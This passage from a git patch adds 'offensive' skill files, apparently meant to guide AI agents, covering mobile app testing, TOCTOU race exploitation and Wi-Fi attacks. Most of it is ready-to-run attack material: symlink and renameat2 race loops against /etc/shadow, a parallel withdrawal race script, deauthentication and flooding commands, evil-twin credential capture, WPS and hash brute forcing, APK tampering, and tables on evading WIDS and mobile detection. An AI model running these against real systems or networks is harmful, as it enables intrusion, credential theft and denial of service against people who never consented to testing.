(highest hit-rate) + +### Firebase Realtime DB (still common) + +Pull URL from app: + +```bash +strings app.apk | grep -E "https://[a-z0-9-]+\.firebaseio\.com" +# Test for unauth read +curl https://target-app.firebaseio.com/.json +# If returns data → unauth read +``` + +### Firestore + +Rules misconfigured to `allow read, write: if true;` — visible in app's REST calls. Test with anon SDK or direct REST. + +### S3 / GCS / Azure Blob + +Unsigned URLs in API responses, or bucket names guessable from app package — test public-read, public-write, ACL. + +### Embedded API Keys + +Google Maps key restricted properly? Stripe publishable vs secret? Twilio? AWS access keys in plaintext (still happens) → cloud takeover. + +```bash +truffleHog filesystem app_src/ +gitleaks detect --source app_src/ +``` + +--- + +## Mobile API Testing + +The backend is the same as a web app — pivot to web/API methodology once you've extracted the endpoints. Things specific to mobile: + +- **Device-bound headers** (`X-Device-ID`, `X-App-Version`, `X-Signature`) often calculable client-side. Pull the algorithm from the binary. +- **Request signing**: HMAC with key embedded in app → game over, sign anything. +- **Mobile-only endpoints** that skip rate limiting because they're "behind app authentication" +- **Older API versions** still alive: `/api/v1/...` retired in newer app, server still serving with weaker auth. +- **Push notification topics**: subscribing to `/topics/` may receive messages meant for others (Firebase Messaging). + +--- + +## App Tampering & Repackaging + +```bash +# Patch a check (e.g. premium=true) +# Smali edit +sed -i 's/return-void/const\/4 v0, 0x1\n return v0/' app/smali/com/vendor/Premium.smali +apktool b app -o patched.apk +apksigner sign --ks debug.keystore patched.apk +adb install -r patched.apk +``` + +For commercial bypasses, use **LSPosed module** so original APK isn't modified — bypasses signature checks that lock down repackaged variants. + +--- + +## iOS Specifics + +### Entitlements + +```bash +codesign -d --entitlements - Payload/App.app/App +``` + +Look for: `keychain-access-groups` (cross-app keychain), `com.apple.security.application-groups` (shared containers), `com.apple.developer.associated-domains` (universal links), private entitlements (rare). + +### URL Schemes from Other Apps + +```objc +[[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"vendorapp://..."]]; +``` + +Any app can invoke any registered URL scheme. Validate sender? Most don't. + +### App Groups Shared Container + +``` +/private/var/mobile/Containers/Shared/AppGroup// +``` + +Multiple apps from same vendor share — secrets here cross app boundary. + +--- + +## Detection / Defender View + +| Detector | Bypass | +|----------|--------| +| Frida server detection (port 27042 open) | Run frida-server on alt port, use `frida -H` | +| Magisk detection via `/sbin/magisk` | Magisk Hide / DenyList | +| Emulator detection | Run on real device, or stub `Build.FINGERPRINT` etc. | +| iOS jailbreak detection (file existence) | Frida hook `stat` / `fopen` / `dlopen` | +| Anti-debug `ptrace(PT_DENY_ATTACH)` | Frida-stalker-based, or kernel patch | +| Certificate pinning | Frida universal pinning bypass | +| App attestation (Play Integrity / DeviceCheck) | Hard — usually requires server-side bypass or app attestation token relay | + +--- + +## Engagement Checklist + +``` +[ ] Pull IPA/APK from device +[ ] Decompile / class-dump +[ ] Grep for endpoints, keys, tokens +[ ] Manifest / Info.plist review +[ ] Static-find exported components, deep links, URL schemes +[ ] Install on rooted/jailbroken; configure Frida +[ ] Bypass pinning, MITM all traffic +[ ] Test every API the app calls (web methodology) +[ ] Test exported components from another app / drozer / runtime +[ ] Inspect on-device storage (sharedprefs, sqlite, keychain) +[ ] Test biometric flows for unbound auth +[ ] Test deep links / URL schemes for auth bypass / open redirect / IDOR +[ ] Cloud config: Firebase rules, S3 buckets, signed URLs +[ ] Push topics / subscription model +[ ] Device-binding / signing scheme analysis +``` + +--- + +## Key References + +- OWASP MASTG (Mobile Application Security Testing Guide) +- OWASP MASVS — verification standard +- Frida CodeShare — codeshare.frida.re for ready-to-use hooks +- mobile-security-framework / MobSF for automated triage +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/mobile.md diff --git a/Skills/offensive-toctou/SKILL.md b/Skills/offensive-toctou/SKILL.md new file mode 100644 index 0000000..ba68173 --- /dev/null +++ b/Skills/offensive-toctou/SKILL.md @@ -0,0 +1,347 @@ +--- +name: offensive-toctou +description: "Time-of-Check / Time-of-Use (TOCTOU) race condition exploitation methodology across binary, kernel, filesystem, web, and container layers. Covers symbolic-link races (open/access/stat split), file-descriptor races, fopen/realpath traversal races, /proc and procfs races, FUSE-backed slow-fs races to widen the window, ptrace and signal races, kernel double-fetch / userspace pointer races, container/runc/symlink escape primitives, kubernetes admission/authz TOCTOU, web auth-vs-authz TOCTOU, JWT-claim TOCTOU at gateway vs service, payment/idempotency races, and modern race-amplification techniques (single-packet attack, slow loris, FUSE pause, cgroup freeze, scheduler shaping). Use when you've identified a 'check then act' pattern in code, when fuzzing for race conditions, or when exploiting concurrency bugs in privileged binaries / kernel / orchestrators." +--- + +# TOCTOU — Time-of-Check / Time-of-Use Exploitation + +A TOCTOU bug exists wherever code checks a property (file owner, path target, token validity, balance) and then acts on it as if the property still holds. Between check and use is a window — your job is to widen it and swap the underlying object. + +## Quick Workflow + +1. Identify the **check** (syscall, function, validation step) and the **use** (the privileged action) +2. Confirm the check and use don't operate on the same kernel object (FD, inode, atomic snapshot) +3. Build a primitive that swaps the object between check and use (symlink, mount, mv, parallel request) +4. **Widen the window** with FUSE, slow filesystems, scheduler tricks, or single-packet HTTP/2 +5. Run a tight loop and confirm the post-use state corresponds to the swapped target + +--- + +## The Core Pattern + +```c +// Vulnerable +if (access(path, W_OK) == 0) { // check — resolves "path" now + fd = open(path, O_WRONLY); // use — re-resolves "path" later + write(fd, attacker_data, n); +} +``` + +Between `access` and `open`, an attacker replaces `path` with a symlink to `/etc/shadow`. The check sees an attacker-owned file; the use opens shadow as root. + +The fix is always: **operate on the kernel object, not the path.** Use `O_NOFOLLOW`, `openat` with `AT_SYMLINK_NOFOLLOW`, `fstat` on the FD, etc. + +--- + +## Filesystem TOCTOU + +### Symlink Swap (Classic) + +```bash +# Setup target — privileged binary that writes to user-supplied path after access() check +victim --output /tmp/.attacker/output + +# Race loop +while true; do + ln -sf /etc/passwd /tmp/.attacker/output 2>/dev/null + ln -sf /tmp/.attacker/legit /tmp/.attacker/output 2>/dev/null +done & + +# Run victim repeatedly +while true; do victim --output /tmp/.attacker/output; done +``` + +### renameat2(RENAME_EXCHANGE) — Atomic Single-Frame Swap + +```c +syscall(SYS_renameat2, AT_FDCWD, "good", AT_FDCWD, "bad", RENAME_EXCHANGE); +``` + +`RENAME_EXCHANGE` swaps two paths atomically — combined with FUSE-paused dir lookups, this is a near-deterministic primitive on Linux ≥ 3.15. + +### Directory Swap (mv between two prepared trees) + +When the victim resolves `parent/file`, swap `parent` itself: + +```bash +mv good_dir parent && mv evil_dir parent_was_good_dir +# If victim is mid-resolution of `parent/file`, dir cache may pin one side +``` + +### Bind Mount / Mount-Namespace Swap (root-only or in user-ns) + +```bash +unshare -mUr +mkdir /tmp/x /tmp/y +echo benign > /tmp/x/file +mount --bind /etc/shadow /tmp/y/file +# Then: while true; do mount --move /tmp/x /tmp/m; mount --move /tmp/y /tmp/m; done +``` + +In containerized contexts with `CAP_SYS_ADMIN` in a user namespace, this is the foundation of multiple runc/CVE escape chains. + +--- + +## Window-Widening Primitives + +The race is always winnable in theory; in practice you need the window large enough for your swap. + +### FUSE-Backed Slow Filesystem + +Mount a FUSE filesystem you control. When the victim does `open` or `stat`, your handler sleeps: + +```python +# fusepy +class SlowFS(Operations): + def getattr(self, path, fh=None): + if path == '/trigger': + time.sleep(5) # stretch the check + return os.lstat(self.root + path).__dict__ +``` + +Now the check call inside the victim blocks for 5 seconds — plenty of time to swap the post-check filename. + +### Userfaultfd (kernel-level page faults) + +```c +// Register a userfault region; when the victim reads the user-controlled buffer, +// pause it in the page-fault handler, swap data, then resume. +ioctl(uffd, UFFDIO_REGISTER, ®); +``` + +`userfaultfd` can pause a kernel-side `copy_from_user` mid-read, enabling double-fetch wins. Linux ≥ 5.11 requires `vm.unprivileged_userfaultfd=1` (off by default in many distros). + +### Cgroup Freeze + +```bash +mkdir /sys/fs/cgroup/race +echo $victim_pid > /sys/fs/cgroup/race/cgroup.procs +echo 1 > /sys/fs/cgroup/race/cgroup.freeze # pause +# swap files +echo 0 > /sys/fs/cgroup/race/cgroup.freeze # resume +``` + +### Single-CPU Pinning + sched_yield + +```c +cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); +sched_setaffinity(victim_pid, sizeof(set), &set); +// Race threads on same CPU — context switch is the only progress unit +``` + +--- + +## Kernel Double-Fetch + +A kernel function reads the same userspace location twice; an attacker mutates it in between using userfaultfd or another thread. + +```c +// Vulnerable kernel pattern +copy_from_user(&size, &user_arg->size, 4); // first fetch +if (size > MAX) return -EINVAL; +copy_from_user(buf, user_arg->data, size); // size re-fetched? Or from local? Check carefully. +``` + +Tooling: KFENCE, Bochspwn-Reloaded, DECAF — fuzzers and analyzers that detect double-fetches. + +--- + +## /proc and procfs Races + +### /proc/pid/exe + ptrace + +`/proc//exe` is a magic symlink. If a privileged binary opens it after fork+exec, an attacker can race the exec to point exe at attacker-controlled binary on a slow filesystem. Foundation of CVE-2019-5736 (runc). + +```c +// Sketch +fd = open("/proc/self/exe", O_RDONLY); // by attacker, in container +// Then the host runc opens /proc//exe to write — opens *attacker's* exe → host RCE +``` + +### /proc/pid/mem + +`open("/proc/pid/mem")` followed by `lseek+write` historically bypassed write protections. Modern kernels enforce ptrace credentials at write time, but legacy or patched-out checks still exist in embedded kernels. + +### /proc/pid/cwd / fd / root + +Symlinks resolve at deref time using the target task's namespace. Cross-namespace deref of `/proc/pid/root/etc/shadow` from a sibling container is a recurring vuln class. + +--- + +## Setuid Binary TOCTOU + +```c +// Vulnerable flow in classic SUID binary +if (!access(file, R_OK)) { // check with real UID via access() + fd = open(file, O_RDONLY); // open with effective UID = root + sendfile(stdout, fd, ...); +} +``` + +Symlink swap between `access` and `open` makes the binary read root-readable files for unprivileged users. + +**Rule of thumb when reviewing setuid/setgid binaries:** every path appearing twice in a syscall trace is a candidate. + +```bash +strace -f -e openat,access,stat,lstat,readlink ./suid_binary 2>&1 | grep "$user_input" +# Multiple resolutions of the same user-controlled path = TOCTOU surface +``` + +--- + +## Container Escape via TOCTOU + +### CVE-2019-5736 (runc) — `/proc/self/exe` Overwrite + +When a container runs `docker exec`, runc opens `/proc/self/exe` from the host. By replacing the in-container binary with a symlink to `/proc/self/exe`, the host runc rewrites itself. + +### CVE-2024-21626 (runc "Leaky Vessels") — Working-Directory FD Leak + +A leaked file descriptor to the host filesystem could be inherited via `WORKDIR /proc/self/fd/` — the container's first process held a host FD, races on namespace setup let it act on host paths. + +### Symlink-on-Mount Race + +When the runtime resolves a bind-mount source/target path (e.g. for tmpfs setup), a fast attacker swaps a directory in the path with a symlink to `/`. Common in Kubernetes hostPath, Docker volumes, OpenShift SCC bypasses. + +--- + +## Web / API TOCTOU + +### Auth vs Authz Split at Gateway + +``` +Gateway: validates JWT (signature, exp) → forwards to service +Service: trusts gateway's "X-User-Id" header +``` + +If the JWT is revoked between gateway cache and gateway validation, or the gateway caches "valid" results too long, you get post-revocation access. Cache-key confusion (different gateway nodes) widens the window. + +### Permission Recheck Skipped on Long-Running Action + +```python +# Vulnerable +def long_export(user, resource_id): + check_access(user, resource_id) # check + data = stream_resource(resource_id) # use — minutes long + return data # access could have been revoked mid-stream +``` + +Test: revoke access while a download is mid-stream; if data continues, recheck is missing. + +### Idempotency-Key Reuse with Different Body + +```http +POST /api/withdraw Idempotency-Key: K1 { "amount": 1 } +POST /api/withdraw Idempotency-Key: K1 { "amount": 1000 } # Same key, different body +``` + +Many implementations key only on the key, not key+body-hash → second request returns the first's response while still processing the second's debit. + +### Single-Packet Multi-Request + +``` +HTTP/2: hold N requests' DATA frames, send all END_STREAM in one TCP segment. +Server schedules N handlers concurrently with sub-millisecond skew → reliable race wins. +Tool: Burp Repeater "Send group in parallel (single-packet)". +``` + +This is the standard primitive for web TOCTOU since 2023; old `httpie ... &` parallelism is obsolete. + +### Limit / Quota TOCTOU + +```python +# Vulnerable +if user.balance >= amount: # check + user.balance -= amount # use — non-atomic read-modify-write + pay(user, amount) +``` + +Send N parallel requests, each sees the same pre-decrement balance. Fix: atomic decrement with constraint (`UPDATE ... WHERE balance >= amount`). + +--- + +## Mobile / Binary Cookbook + +### Android: Intent Redirect TOCTOU + +Activity checks calling package via `getCallingPackage()` then dispatches via Intent — between check and dispatch, attacker swaps the underlying ContentProvider URI authority resolution. + +### iOS: NSXPC Audit Token Confusion + +`audit_token_t` should be captured at the start of each XPC message handling. If the service captures it once and reuses, an attacker can race PID reuse to impersonate. + +--- + +## Detection & Tooling + +| Tool | Layer | Use | +|------|-------|-----| +| `strace -e trace=file -f` | Linux syscall | Find duplicate path resolutions | +| `bpftrace` / `bcc` | Kernel | Probe specific syscalls' args at scale | +| ThreadSanitizer (TSan) | Userspace C/C++ | Compile-time race detection | +| Helgrind / DRD | Userspace | Pthread race detection | +| Bochspwn-Reloaded | Kernel | Double-fetch detection | +| `syzkaller` | Kernel | Coverage-guided race fuzzing | +| Burp Suite (Repeater single-packet) | Web/HTTP | Concurrent request races | +| `racepwn` | Web | Multi-thread + timing harness | +| `Turbo Intruder` | Web | Pipelined parallel requests | + +```bash +# Quick filesystem TOCTOU finder against a binary +strace -f -e trace=file ./target 2>&1 | \ + awk -F'"' '/access|stat|lstat|open|readlink/ {print $2}' | \ + sort | uniq -c | sort -rn | head +# Paths appearing N>1 times → TOCTOU candidates +``` + +--- + +## Race Loop Templates + +### Filesystem (C) + +```c +#include +#include +int main() { + pid_t p = fork(); + if (!p) { for(;;) syscall(SYS_renameat2, -100,"a",-100,"b",RENAME_EXCHANGE); } + for(;;) execve(victim, args, env); +} +``` + +### Web (Python — single-packet HTTP/2) + +```python +# Use httpx or h2 directly; pyburp or turbo-intruder for production +import httpx, anyio +async def race(): + async with httpx.AsyncClient(http2=True) as c: + async with anyio.create_task_group() as tg: + for _ in range(30): + tg.start_soon(c.post, "https://app/withdraw", json={"amount": 100}) +anyio.run(race) +``` + +For real reliability on TLS, prefer Burp's single-packet feature — it crafts an HTTP/2 last-byte synchronization. + +--- + +## Reporting / Severity + +A TOCTOU finding's severity rests on: window size (deterministic vs probabilistic), required adjacency (local user / container / authenticated remote), and the post-use primitive (file write, auth bypass, money). A "1-in-10000 race that gives root" is the same finding as a "deterministic race that gives root" once it's chained with a window-widening primitive. Always demonstrate: + +1. The minimum reproducer +2. The window-widener used +3. The success rate observed +4. The post-exploit primitive achieved + +--- + +## Key References + +- MITRE CWE-367 (TOCTOU), CWE-362 (Race Condition) +- USENIX Security: "FUSE for Profit" — TOCTOU window-widening +- PortSwigger Research: "Smashing the state machine" (single-packet HTTP/2 attack) +- runc CVE-2019-5736, CVE-2024-21626 advisories +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/toctou.md diff --git a/Skills/offensive-wifi/SKILL.md b/Skills/offensive-wifi/SKILL.md new file mode 100644 index 0000000..34fb5d4 --- /dev/null +++ b/Skills/offensive-wifi/SKILL.md @@ -0,0 +1,345 @@ +--- +name: offensive-wifi +description: "Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation." +--- + +# Wireless / 802.11 — Offensive Testing Methodology + +## Quick Workflow + +1. Pick the right adapter (monitor mode + injection + correct band/PHY for target) +2. Recon airspace passively — never deauth before you know the topology +3. Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS +4. Crack offline; do not rely on online dictionary attacks +5. If WPA-Enterprise, pivot through stolen creds or rogue RADIUS + +--- + +## Hardware & Adapter Selection + +| Chipset | Strengths | Notes | +|---------|-----------|-------| +| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only | +| Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: `aircrack-ng/rtl8812au` | +| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree | +| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required | +| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release | + +```bash +# Verify monitor + injection +sudo airmon-ng check kill +sudo airmon-ng start wlan0 +sudo aireplay-ng --test wlan0mon +iw list | grep -A 8 "Supported interface modes" +``` + +--- + +## Reconnaissance + +```bash +# Multi-channel discovery (all bands) +sudo airodump-ng wlan0mon --band abg + +# Targeted on a known channel/BSSID +sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon + +# Hidden SSID — wait for client probe or force deauth +sudo airodump-ng -c 6 --essid-regex "." wlan0mon + +# Wigle / Kismet for war-driving +kismet -c wlan0mon +``` + +**Key data to record:** BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI. + +--- + +## WPA / WPA2-PSK + +### Four-way Handshake Capture + +```bash +# Targeted capture +sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon + +# Force a reconnect (deauth one client, do not blanket the AP) +sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon +``` + +Verify the EAPOL frames are usable: + +```bash +hcxpcapngtool -o hash.hc22000 handshake-01.cap +``` + +### PMKID (No Client Required) + +PMKID lives in the first AP-to-station message — you can grab it without anyone connected. + +```bash +sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ + --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 + +hcxpcapngtool -o hash.hc22000 pmkid.pcapng +``` + +### Cracking + +```bash +# GPU dictionary attack +hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule + +# Mask attack (e.g. carrier defaults: 10 digits) +hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d + +# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators) +upc_keys ESSID | hashcat -m 22000 hash.hc22000 - +``` + +--- + +## WPA3 / SAE + +### Transition-Mode Downgrade + +If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK. + +### Dragonblood (CVE-2019-9494/9495/13377) + +Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks. + +```bash +# Reference implementation +git clone https://github.com/vanhoefm/dragonblood +python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF +python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon +``` + +### SAE Auth Flooding (Resource Exhaustion) + +```bash +sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024 +# Triggers heavy crypto on AP CPU; can DoS lower-end deployments +``` + +--- + +## WPA-Enterprise (802.1X / EAP) + +### Method Identification + +```bash +# Watch initial EAP-Request/Identity to fingerprint method +tshark -i wlan0mon -Y "eapol || eap" -V +``` + +| Inner Method | Attack | +|--------------|--------| +| EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline | +| EAP-GTC | Cleartext password — capture via rogue RADIUS | +| EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) | +| EAP-PWD | Dragonblood-class side channels | + +### Evil-Twin RADIUS (MSCHAPv2 / GTC) + +```bash +# eaphammer — automated rogue AP + RADIUS +eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \ + --auth wpa-eap --creds + +# Captured hashes → asleap or hashcat -m 5500 +asleap -C challenge -R response -W wordlist.txt +``` + +**Critical:** organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with `ServerValidation` disabled (common for BYOD) will hand over creds. + +### EAP-TLS Cert Theft Paths + +- DPAPI master key + cert blob from user profile (`%APPDATA%\Microsoft\SystemCertificates`) +- NDES misconfig (ESC8-class cert request abuse) +- ADCS user auto-enrollment template with weak ACL + +--- + +## WPS + +### Pixie Dust (Offline) + +```bash +# Capture WPS exchange +reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv +# Or +bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon +``` + +Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable. + +### Online PIN Brute (Last Resort) + +```bash +reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30 +# Most modern APs lock out after a few failures — slow and noisy +``` + +--- + +## Evil Twin / KARMA / Mana + +### Stock Evil Twin (Captive Portal) + +```bash +# wifiphisher — automated AP + phishing portal +sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd + +# airgeddon — interactive menu (good for one-off engagements) +sudo airgeddon +``` + +### KARMA / Mana (Probe Exploitation) + +Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization. + +```bash +# hostapd-mana +sudo hostapd-mana ./mana.conf + +# Combine with rogue RADIUS for enterprise nets +eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \ + --auth wpa-eap --creds --hostile-portal +``` + +### MAC Randomization Defeat + +iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices. + +--- + +## KRACK & FragAttacks + +| Attack | Class | Target | +|--------|-------|--------| +| KRACK (CVE-2017-13077..082) | Key reinstallation | Unpatched WPA2 supplicants | +| FragAttacks (CVE-2020-24586..588) | Fragmentation/aggregation | Most pre-2021 implementations | + +Test a network's patch status: + +```bash +# Vanhoef test scripts +git clone https://github.com/vanhoefm/krackattacks-scripts +./krack-test-client.py +git clone https://github.com/vanhoefm/fragattacks +./test-fragattacks.py wlan0 +``` + +--- + +## Deauth / Disassociation Attacks + +```bash +# Single client deauth (use for handshake capture) +aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon + +# Broadcast (DoS — only with explicit authorization) +mdk4 wlan0mon d -B target_bssids.txt + +# Disassoc + auth flood combo (kicks then prevents reconnect) +mdk4 wlan0mon a -a AP_BSSID -m +``` + +802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via `Action` frames. + +--- + +## 802.1X / Wired NAC Bypass (Adjacent) + +```bash +# Sniff valid 802.1X exchange on wired side +tcpdump -i eth0 -w nac.pcap ether proto 0x888e + +# silentbridge / nac_bypass — transparently bridge through an authenticated host +git clone https://github.com/s0lst1c3/silentbridge +silentbridge --takeover --phy wlan0 # variants for wired +``` + +--- + +## Wi-Fi 6 / 6E / 7 Considerations + +- **6 GHz (Wi-Fi 6E)** disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec. +- **OFDMA / MU-MIMO**: legacy injection often misaligns with RU allocations — verify packet delivery on test bench. +- **TWT (Target Wake Time)**: deauth windows differ; observe BA sessions before injecting. +- **MLO (Wi-Fi 7)**: a single client over multiple links — capture must cover all links to recover full session. + +--- + +## Sidebands & Adjacent Wireless + +| Tech | Tool | Notes | +|------|------|-------| +| Bluetooth Classic | `redfang`, `crackle`, `btproxy` | LMP/L2CAP fuzzing | +| BLE | `bettercap`, `Sniffle` (TI CC1352), `Frontline` | GATT enumeration, LE Secure Connections downgrade | +| Zigbee / 802.15.4 | `KillerBee`, `apimote`, `ATUSB` | Touchlink commissioning abuse | +| Z-Wave | `Z-Force`, `EZ-Wave` | S0 key reuse bug class | +| LoRa / LoRaWAN | `LoRaPWN`, `ChirpStack` | Join-request replay, ABP key reuse | +| 433/868 MHz (Sub-GHz) | HackRF / Flipper Zero | Garage doors, doorbells, telemetry | + +--- + +## RADIUS / Backend Pivots Post-Compromise + +```bash +# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD +nxc smb dc -u captured_user -p cracked_pass --pass-pol + +# If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets +# If on Windows NPS, pivot via the service account context +``` + +--- + +## Engagement Cheatsheet + +```bash +# 1. Setup +sudo airmon-ng check kill && sudo airmon-ng start wlan0 +sudo iw reg set US + +# 2. Recon (do not deauth yet) +sudo airodump-ng wlan0mon --band abg --write recon + +# 3. PMKID sweep (passive) +sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 + +# 4. Targeted capture if PMKID empty +sudo airodump-ng -c --bssid -w cap wlan0mon & +sudo aireplay-ng --deauth 3 -a -c wlan0mon + +# 5. Crack offline +hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule + +# 6. If enterprise → eaphammer evil twin +# 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time +``` + +--- + +## Detection / Defender View + +| AP/WIDS Detector | Trigger | Evasion | +|------------------|---------|---------| +| Excessive deauth | >5 deauth/sec from one source MAC | Spread across spoofed MACs, target individuals | +| Rogue AP detection | Unauthorized BSSID on monitored channel | Match real BSSID's beacon timing/IE order exactly | +| Karma response anomaly | AP answering all probe SSIDs | Use Mana mode, pick one plausible SSID | +| WPS lockout | Repeated PIN failures | Pixie Dust offline only, abandon online brute | +| RADIUS log: cert mismatch | Supplicant rejects evil-twin cert | Use copies of victim CA-signed certs (unlikely) | + +--- + +## Key References + +- MITRE ATT&CK: T1200 (Hardware Additions), T1557.004 (AiTM via Evil Twin) +- IEEE 802.11-2020 (combined spec including KRACK mitigations) +- WPA3 Spec / Wi-Fi Alliance: dragonblood.net for vuln tracking +- hcxtools / hashcat WPA modes: docs at hashcat.net +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md From 70e0c89e3be457c1f7fe071c0ed5c9fb1da6f0fb Mon Sep 17 00:00:00 2001 From: Claude Date: Wed, 6 May 2026 07:49:07 +0000 Subject: [PATCH 2/4] Reorganize skills into 13 categories + add offensive-reporting Categories: - web/ (16 skills) - SQLi, XSS, SSRF, SSTI, XXE, IDOR, file-upload, RCE, deserialization, race-condition, request-smuggling, open-redirect, parameter-pollution, GraphQL, WAF-bypass, business-logic - auth/ (2) - JWT, OAuth - active-directory/ (1) - active-directory [room to grow] - wireless/ (1) - wifi [room to grow] - cloud/ (1) - cloud [room to grow] - mobile/ (1) - mobile [room to grow] - iot/ (1) - iot [room to grow] - infrastructure/ (7) - initial-access, advanced-redteam, edr-evasion, shellcode, keylogger-arch, windows-mitigations, windows-boundaries - exploit-dev/ (6) - exploit-development, exploit-dev-course, basic-exploitation, crash-analysis, mitigations, toctou - fuzzing/ (4) - fuzzing, fuzzing-course, bug-identification, vuln-classes - recon/ (2) - osint, osint-methodology - ai/ (1) - ai-security - utility/ (2) - fast-checking, reporting (NEW) New skill: - offensive-reporting: pro pentest report writing methodology covering CVSS scoring, evidence hygiene, executive summaries, finding templates, attack chain narratives, deliverable formats, retest discipline --- .../offensive-active-directory/SKILL.md | 0 .../{ => ai}/offensive-ai-security/SKILL.md | 0 Skills/{ => auth}/offensive-jwt/SKILL.md | 0 Skills/{ => auth}/offensive-oauth/SKILL.md | 0 Skills/{ => cloud}/offensive-cloud/SKILL.md | 0 .../offensive-basic-exploitation/SKILL.md | 0 .../offensive-crash-analysis/SKILL.md | 0 .../offensive-exploit-dev-course/SKILL.md | 0 .../offensive-exploit-development/SKILL.md | 0 .../offensive-mitigations/SKILL.md | 0 .../offensive-toctou/SKILL.md | 0 .../offensive-bug-identification/SKILL.md | 0 .../offensive-fuzzing-course/SKILL.md | 0 .../{ => fuzzing}/offensive-fuzzing/SKILL.md | 0 .../offensive-vuln-classes/SKILL.md | 0 .../offensive-advanced-redteam/SKILL.md | 0 .../offensive-edr-evasion/SKILL.md | 0 .../offensive-initial-access/SKILL.md | 0 .../offensive-keylogger-arch/SKILL.md | 0 .../offensive-shellcode/SKILL.md | 0 .../offensive-windows-boundaries/SKILL.md | 0 .../offensive-windows-mitigations/SKILL.md | 0 Skills/{ => iot}/offensive-iot/SKILL.md | 0 Skills/{ => mobile}/offensive-mobile/SKILL.md | 0 .../offensive-osint-methodology/SKILL.md | 0 Skills/{ => recon}/offensive-osint/SKILL.md | 0 .../offensive-fast-checking/SKILL.md | 0 Skills/utility/offensive-reporting/SKILL.md | 371 ++++++++++++++++++ .../offensive-business-logic/SKILL.md | 0 .../offensive-deserialization/SKILL.md | 0 .../{ => web}/offensive-file-upload/SKILL.md | 0 Skills/{ => web}/offensive-graphql/SKILL.md | 0 Skills/{ => web}/offensive-idor/SKILL.md | 0 .../offensive-open-redirect/SKILL.md | 0 .../offensive-parameter-pollution/SKILL.md | 0 .../offensive-race-condition/SKILL.md | 0 Skills/{ => web}/offensive-rce/SKILL.md | 0 .../offensive-request-smuggling/SKILL.md | 0 Skills/{ => web}/offensive-sqli/SKILL.md | 0 Skills/{ => web}/offensive-ssrf/SKILL.md | 0 Skills/{ => web}/offensive-ssti/SKILL.md | 0 .../{ => web}/offensive-waf-bypass/SKILL.md | 0 Skills/{ => web}/offensive-xss/SKILL.md | 0 Skills/{ => web}/offensive-xxe/SKILL.md | 0 Skills/{ => wireless}/offensive-wifi/SKILL.md | 0 45 files changed, 371 insertions(+) rename Skills/{ => active-directory}/offensive-active-directory/SKILL.md (100%) rename Skills/{ => ai}/offensive-ai-security/SKILL.md (100%) rename Skills/{ => auth}/offensive-jwt/SKILL.md (100%) rename Skills/{ => auth}/offensive-oauth/SKILL.md (100%) rename Skills/{ => cloud}/offensive-cloud/SKILL.md (100%) rename Skills/{ => exploit-dev}/offensive-basic-exploitation/SKILL.md (100%) rename Skills/{ => 